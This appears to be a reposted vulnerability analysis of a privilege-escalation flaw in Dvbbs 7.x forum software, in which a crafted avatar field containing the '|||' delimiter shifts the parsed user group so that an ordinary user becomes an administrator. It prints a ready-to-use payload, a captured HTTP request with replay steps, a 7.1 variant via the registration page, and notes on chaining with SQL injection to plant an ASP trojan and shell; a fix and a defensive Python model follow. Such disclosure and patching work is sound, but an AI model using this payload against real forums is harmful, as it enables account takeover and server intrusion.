Analysis of the Dvbbs 7.x front-end privilege elevation vulnerability

Source: Internet
Author: User
Tags: sql injection, trim
In June I read an article in Hacker Defense (黑防), "Dvbbs 7.1 vulnerabilities discovered", which said that the admin_postings.asp file has an injection vulnerability, but that exploiting it requires super moderator or front-end administrator rights. I recalled a front-end privilege elevation vulnerability I had found earlier in Dvbbs 7.x; the two can be chained. This front-end privilege elevation vulnerability affects both the Access and the SQL versions of 7.x. Below, the 7.0 SP2 SQL version is used to explain the exploit.
Vulnerability Analysis:
Dvbbs determines the current user's group from GroupID and then uses that group's record to decide the user's permissions. Where does GroupID come from? Look at the login check in Login.asp, around line 525:
Rem ========== Forum login functions ==========
Rem Check user login
Function ChkUserLogin(Username, Password, Mobile, UserCookies, CType)
    ............ preceding code omitted
    SQL = "Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace," & _
          "UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,LockUser,UserClass,UserGroupID,UserGroup," & _
          "UserWealth,UserEP,UserCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden," & _
          "UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassword,UserToday "
    SQL = SQL & "from [Dv_User] Where " & SQLStr & ""
    Set RsUser = Dvbbs.Execute(SQL)
    If RsUser.EOF And RsUser.BOF Then
        ChkUserLogin = False
        Exit Function
    Else
        iMyUserInfo = RsUser.GetString(, 1, "|||", "", "")
        RsUser.Close: Set RsUser = Nothing
    End If
    iMyUserInfo = "dvbbs|||" & Now & "|||" & Now & "|||" & Dvbbs.BoardID & "|||" & iMyUserInfo & "|||Dvbbs"
    iMyUserInfo = Split(iMyUserInfo, "|||")
    If Trim(Password) <> Trim(iMyUserInfo(6)) Then
        ChkUserLogin = False
    ElseIf iMyUserInfo(=1) Then
        ChkUserLogin = False
    ElseIf iMyUserInfo(=5) Then
        ChkUserLogin = False
    Else
        ChkUserLogin = True
        Session(Dvbbs.CacheName & "UserID") = iMyUserInfo
        Dvbbs.UserID = iMyUserInfo(4)
        RegName = iMyUserInfo(5)
        Article = iMyUserInfo(8)
        UserLastLogin = iMyUserInfo(15)
        UserClass = iMyUserInfo(18)
        GroupID = iMyUserInfo(19)
        TitlePic = iMyUserInfo(34)
        If Article < 0 Then Article = 0
    End If
    ............ following code omitted
As you can see, Dvbbs first joins the fields of the user's record with the three-bar delimiter "|||" into one string, assigns it to iMyUserInfo, and then splits iMyUserInfo on "|||" into a string array. Once the password check passes, the 20th element of that array, iMyUserInfo(19), is assigned to GroupID. So GroupID is nothing more than the 20th array element: if iMyUserInfo(19) is 1, Dvbbs treats the user who just logged in as a front-end administrator.
The dv_clsmain.asp file in the inc directory contains a second piece of code that re-reads the user record to determine permissions after the user updates their profile, around line 650 of dv_clsmain.asp:
Public Sub TrueCheckUserLogin()
    ...... preceding code omitted
    Dim Rs, SQL
    SQL = "Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex," & _
          "UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,LockUser,UserClass,UserGroupID," & _
          "UserGroup,UserWealth,UserEP,UserCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest," & _
          "UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassword,UserToday "
    SQL = SQL & "from [Dv_User] Where UserID = " & UserID
    Set Rs = Execute(SQL)
    If Rs.EOF And Rs.BOF Then
        Rs.Close: Set Rs = Nothing
        UserID = 0
        EmptyCookies
        LetGuestSession()
    Else
        MyUserInfo = Rs.GetString(, 1, "|||", "", "")
        Rs.Close: Set Rs = Nothing
        If IsArray(Session(CacheName & "UserID")) Then
            MyUserInfo = "dvbbs|||" & Now & "|||" & Session(CacheName & "UserID")(2) & "|||" & BoardID & "|||" & MyUserInfo & "|||Dvbbs"
        Else
            MyUserInfo = "dvbbs|||" & Now & "|||" & DateAdd("s", -3600, Now()) & "|||" & BoardID & "|||" & MyUserInfo & "|||Dvbbs"
        End If
        Response.Write MyUserInfo
        MyUserInfo = Split(MyUserInfo, "|||")
        ......
    End If
End Sub
After a successful login, this procedure reads the cached user array and derives some common fields from it:
Public Sub GetCacheUserInfo()
    MyUserInfo = Session(CacheName & "UserID")
    UserID = CLng(MyUserInfo(4))
    MemberName = MyUserInfo(5)
    LastLogin = MyUserInfo(15)
    If Not IsDate(LastLogin) Then LastLogin = Now()
    UserGroupID = CInt(MyUserInfo(19))
    ...... remaining code omitted
Both checks work in exactly the same way, so either of them can be used to reach our goal. Look at the SQL statement:
SQL = "Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,LockUser,UserClass,UserGroupID,UserGroup,UserWealth,UserEP,UserCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassword,UserToday "
SQL = SQL & "from [Dv_User] Where UserID = " & UserID

The UserGroupID column is the 16th in the SELECT list, so if a field before it contains "|||", the position of UserGroupID in the MyUserInfo string array shifts. The field we choose has to meet a few requirements: its type must be suitable (not numeric), it must be long enough to hold the array we construct, and it must come before UserGroupID in the SQL statement above, so that the constructed array shifts the position of UserGroupID in the original array. See Figure 1.
Only two fields qualify: UserEmail and UserFace. Because of the IsValidEmail function we cannot put '|' into the UserEmail field, which leaves only UserFace.
In the basic profile update, Dvbbs filters only a handful of symbols against SQL injection and does not filter '|', so as long as we construct the right string we can fool Dvbbs into treating us as a member of the administrators group:
Face = Dv_FilterJS(Replace(Face, "", ""))
Face = Replace(Face, "..", "")
Face = Replace(Face, "\", "/")
Face = Replace(Face, "^", "")
Face = Replace(Face, "#", "")
Face = Replace(Face, "%", "")
Exploiting the vulnerability:
How do we construct this UserFace to reach our goal? At first I thought that making iMyUserInfo(19) equal to 1 would be enough to become administrator, but that did not work. In fact, when we construct UserFace we have to take into account that we are changing the structure of the iMyUserInfo array: the first part of the new iMyUserInfo array must have exactly the same structure as the original array, otherwise a type conversion error occurs. For example, the value at the UserBirthday position of the new array must be a date. We can simply take the second half of a normal iMyUserInfo as our UserFace value and change the UserGroupID position to 1. I modified login.asp so that it displays the contents of the current user's iMyUserInfo at login, as shown in Figure 2.
For example, the value of iMyUserInfo when admin logs in (it need not be admin; any other user works, as long as the UserGroupID position is changed to 1) is:
dvbbs|||2005-6-19 18:05:34|||2005-6-19 18:05:34|||0|||1|||admin|||469e80d32c0559f8|||eway@aspsky.net|||4|||1|||0|||images/userface/image1.gif|||32|||32|||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0|||admin|||1||||||120|||115|||28|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7im7|||0|0|0|||Dvbbs
We can take
images/userface/image1.gif|||32|||32|||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0|||admin|||1||||||120|||115|||28|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7im7|||0|0|0|||Dvbbs

as our UserFace value. Note that this value cannot exceed 255 characters. The form limits what we submit to 100 characters, so we submit with NC instead.
First, test on the local machine: log in to the forum as an ordinary user; the user level is still "newbie".
OK, go to the page where basic profile information is modified.
Submit, and capture the request with WSE.
The captured packet is as follows:
POST /bs/mymodify.asp?action=updat&username=4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://210.41.235.199/bs/mymodify.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; Mxie; .NET CLR 1.1.4322)
Host: 210.41.235.199
Content-Length: 396
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 210%2e41%2e235%2e199%2fbs%2f=usercookies=0&statuserid=21048347059&password=fviy4l887zvd956c&userhidden=&username=test&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&userid=4; upnum=0; ASPSESSIONIDASCDABTA=IEGHDLKCCHDMOBPFPFFHMNAM

title=&sex=1&face=images%2fuserface%2fimage1.gif&myface=images%2fuserface%2fimage1.gif&width=32&height=32&birthday=&userphoto=&groupname=%ce%de%c3%c5%ce%de%c5%c9&signature=&showre=0&usercookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&submit=%b8%fc+%d0%c2
Now we replace the value of UserFace with:
images/userface/image1.gif|||32|||32|||2003-12-30%2016:34:00|||2005-6-19%2018:04:06|||25|||0|||admin|||1||||||120|||115|||28|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7im7|||0|0|0|||Dvbbs
Note that the spaces in the middle are replaced with %20. Recalculate the Content-Length value, submit the request once with NC, and our user's UserFace is replaced. Now log in again.
Haha, did you see it? We are already an administrator. Then, using the injection from the Hacker Defense issue 6 article "Dvbbs 7.1 vulnerabilities discovered", a back-end administrator can be added.
Exploitation on Dvbbs 7.1:
Exploiting this on Dvbbs 7.1 needs a small change and is harder than on 7.0 SP2: version 7.1 added a filter for the '|' symbol to the Face variable, around line 270 of mymodify.asp:
Face = Dv_FilterJS(Replace(Face, "", ""))
Face = Replace(Face, "..", "")
Face = Replace(Face, "\", "/")
Face = Replace(Face, "^", "")
Face = Replace(Face, "#", "")
Face = Replace(Face, "%", "")
Face = Replace(Face, "|", "")
Unfortunately, the Dvbbs programmer overlooked one thing: the avatar can also be set at registration, and reg.asp does no filtering at all on the Face variable. Near line 285 of reg.asp:
If Request.Form("Face") <> "" Then
    Face = Request.Form("Face")
End If
As before, capture the request and resubmit it with NC. After registering, the login is a front-end administrator. But there is one more issue: TruePassword. 7.1 strengthened its defence against cookie spoofing, so TruePassword now changes very frequently. In 7.0 SP2's newpass.asp there is only one statement that updates the current user's TruePassword:
7.0 SP2's newpass.asp:
<%
Dvbbs.NewPassword0()
%>
In 7.1, newpass.asp also checks whether the user's cookie has been updated. Around line 30 of the 7.1 newpass.asp:
' Check whether the cookie write succeeded; if so, update the data
If Dvbbs.CheckStr(Trim(Request.Cookies(Dvbbs.Forum_SN)("password"))) = TruePassword Then
    Dvbbs.Execute("Update [Dv_User] Set TruePassword='" & TruePassword & "' Where UserID=" & Dvbbs.UserID)
    Dvbbs.MemberWord = TruePassword
    Dim iUserInfo
    iUserInfo = Session(Dvbbs.CacheName & "UserID")
    iUserInfo(km) = TruePassword
    Session(Dvbbs.CacheName & "UserID") = iUserInfo
End If
In 7.1 the TruePassword in our client-side cookie is updated to the new TruePassword, but because the server-side TruePassword is also taken from MyUserInfo, and the TruePassword value inside MyUserInfo never changes, the check turns into an endless loop. Our solution is to lock the cookie: we lock our cookie with Guilin Veteran's (桂林老兵) browser, having first set the TruePassword value in the cookie equal to the TruePassword value in MyUserInfo. Then newpass.asp is no longer requested over and over in an endless loop.
Since I do not have the code of the 7.1 SQL version, the above was tested on the 7.1 Access version, where one can successfully become a front-end administrator.
Postscript:
Prevention: changing the database structure would be a big project, so I suggest filtering the '|' symbol from the corresponding variables in reg.asp and mymodify.asp, for example:
Face = Dv_FilterJS(Replace(Face, "", ""))
Face = Replace(Face, "..", "")
Face = Replace(Face, "\", "/")
Face = Replace(Face, "^", "")
Face = Replace(Face, "#", "")
Face = Replace(Face, "%", "")
Face = Replace(Face, "|", "")
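As an added illustration (my own Python, not Dvbbs code), the following models the "|||"-joined record that Login.asp and dv_clsmain.asp build, reproduces the shift of the UserGroupID slot described in the vulnerability analysis when an avatar path containing the delimiter gets through the 7.0 SP2 filter set, and shows the '|' filter above closing it. The column order is the SELECT quoted earlier; the user values, the group number 4 for an ordinary member and the is_well_formed element-count check are my own assumptions, not something on the page.

```python
# Added example, not Dvbbs code: models the "|||"-joined user record that
# Login.asp and dv_clsmain.asp build, shows how an avatar path containing the
# delimiter shifts the UserGroupID slot, and shows the '|' filter plus a
# structural element-count check closing it. Column order follows the SELECT
# quoted on the page; every user value below is constructed.

SEP = "|||"

FIELDS = (
    "UserID", "UserName", "UserPassword", "UserEmail", "UserPost", "UserTopic",
    "UserSex", "UserFace", "UserWidth", "UserHeight", "JoinDate", "LastLogin",
    "UserLogins", "LockUser", "UserClass", "UserGroupID", "UserGroup",
    "UserWealth", "UserEP", "UserCP", "UserPower", "UserBirthday", "UserLastIP",
    "UserDel", "UserIsBest", "UserHidden", "UserMsg", "IsChallenge",
    "UserMobile", "TitlePic", "UserTitle", "TruePassword", "UserToday",
)

# "dvbbs", Now, Now and BoardID are prepended and "Dvbbs" appended, so the
# 16th column (UserGroupID, index 15) lands at iMyUserInfo(19).
PREFIX = ("dvbbs", "2005-6-19 18:05:34", "2005-6-19 18:05:34", "0")
GROUPID_SLOT = len(PREFIX) + FIELDS.index("UserGroupID")  # 19
EXPECTED_PARTS = len(PREFIX) + len(FIELDS) + 1             # 38

# Constructed record for an ordinary member (group 4 is an assumed value).
NORMAL_USER = dict(zip(FIELDS, (
    "4", "test", "469e80d32c0559f8", "test@example.invalid", "0", "0", "0",
    "images/userface/image1.gif", "32", "32", "2005-6-1 10:00:00",
    "2005-6-19 18:04:06", "3", "0", "newbie", "4", "", "10", "5", "2", "0", "",
    "10.0.0.1", "0", "0", "0", "", "0", "", "level1.gif", "", "fviy4l887zvd956c",
    "0|0|0",
)))


def build_user_string(row):
    """Mimic GetString(,1,"|||","","") plus the prefix and suffix Login.asp adds."""
    return SEP.join(PREFIX + tuple(row[f] for f in FIELDS) + ("Dvbbs",))


def group_id_after_login(row):
    """Mimic GroupID = iMyUserInfo(19): split on "|||" and trust the position."""
    return int(build_user_string(row).split(SEP)[GROUPID_SLOT])


def filter_face_70sp2(face):
    """The mymodify.asp filter quoted on the page: '|' is not removed."""
    for bad, repl in (("..", ""), ("\\", "/"), ("^", ""), ("#", ""), ("%", "")):
        face = face.replace(bad, repl)
    return face


def filter_face_fixed(face):
    """The postscript's fix: also strip the delimiter character."""
    return filter_face_70sp2(face).replace("|", "")


def apply_face_update(row, submitted_face, face_filter):
    """Profile update: the submitted avatar path passes the filter, then is stored."""
    updated = dict(row)
    updated["UserFace"] = face_filter(submitted_face)
    return updated


def crafted_face(row):
    """The kind of avatar value the page describes: the tail of a legitimate
    record from UserFace onward, with the UserGroupID position set to 1."""
    tail = [row[f] for f in FIELDS[FIELDS.index("UserFace"):]] + ["Dvbbs"]
    tail[FIELDS.index("UserGroupID") - FIELDS.index("UserFace")] = "1"
    return SEP.join(tail)


def is_well_formed(user_string):
    """Defence in depth (my suggestion, not on the page): a record whose element
    count differs from the schema has a delimiter inside some field, so reject
    it instead of indexing into it."""
    return len(user_string.split(SEP)) == EXPECTED_PARTS


if __name__ == "__main__":
    face = crafted_face(NORMAL_USER)
    print("normal login group:", group_id_after_login(NORMAL_USER))
    weak = apply_face_update(NORMAL_USER, face, filter_face_70sp2)
    print("after update, 7.0 SP2 filter:", group_id_after_login(weak),
          "well-formed:", is_well_formed(build_user_string(weak)))
    fixed = apply_face_update(NORMAL_USER, face, filter_face_fixed)
    print("after update, fixed filter:", group_id_after_login(fixed),
          "well-formed:", is_well_formed(build_user_string(fixed)))
```

The element-count check is worth keeping alongside the character filter: a filter lives in one page, and the 7.1 reg.asp case above shows how a second input path can miss it, whereas a check at the point where the record is split catches a delimiter no matter which page let it in.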
I also want to mention that Dvbbs trusts the back-end administrator too much, so many back-end pages have no protection against SQL injection, which is like leaving a door open to SQL injection. We once tested a website that was configured extremely tightly. It ran a Dvbbs forum. Only after obtaining Dvbbs admin rights did we discover that the upload directory had no execute permission: an ASP trojan uploaded there came back as it was. The directory with ASP execute permission had no write permission. There were no other injectable sites on the server. Later we found that the Dvbbs back end was injectable, and finally got a small shell. Sweat, sweat.
Sweat again. This privilege elevation flaw is not a very advanced technique, but the consequences are very serious. Because several pages managed from the front end have SQL injection, this vulnerability is very damaging to the Dvbbs 7.x SQL version. Please do not use this method for destructive behaviour; the consequences are your own responsibility.
